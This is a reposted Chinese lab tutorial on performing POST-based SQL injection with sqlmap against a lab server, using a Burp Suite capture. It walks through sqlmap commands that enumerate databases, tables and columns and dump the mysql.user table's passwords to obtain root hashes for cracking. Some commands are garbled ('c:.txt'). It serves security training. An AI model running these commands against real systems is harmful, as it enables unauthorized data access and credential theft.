利用sqlmap进行POST注入

利用sqlmap进行POST注入,第1张

目录 预备知识了解SqlmapPOST注入形成的原因 实验目的实验环境实验步骤一使用sqlmap进行POST注入 实验步骤二

预备知识 了解Sqlmap

sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。

POST注入形成的原因

POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下:

实验目的

通过该实验熟悉sqlmap常用的命令,完成POST注入攻击。

实验环境


服务器:CentOS,IP地址:10.1.1.136
测试者:win7,IP地址随机

实验步骤一 使用sqlmap进行POST注入

1.打开http://10.1.1.136,输入用户名:admin,密码:password,登录:

2.选择Brute Force选项,username和password随便输入(此处我输入admin和123456),然后打开burpsuite,设置好本地代理(忘记的同学可看实验一),进行抓包:


3.将抓到的包保存为1.txt,并放到c盘根目录下。
列数据库,输入命令:

sqlmap.py -r c:.txt -p username --dbs

注:-r表示加载一个文件,-p指定参数。

实验步骤二

4.选择一个数据库,比如选mysql,猜表,输入命令:

sqlmap.py -r c:.txt-p username -D mysql --tables


5.猜列,输入命令:

sqlmap.py -r c:.txt-p username -D mysql -T user --columns


6.猜数据,输入命令:

sqlmap.py -r c:.txt -p username -D mysql -T user -C “User,Password” --dump


7.此时就得到了root用户的密码哈希值,接下来解密就行。

欢迎分享,转载请注明来源:内存溢出

原文地址: https://www.outofmemory.cn/sjk/991470.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-21
下一篇 2022-05-21

发表评论

登录后才能评论

评论列表(0条)

保存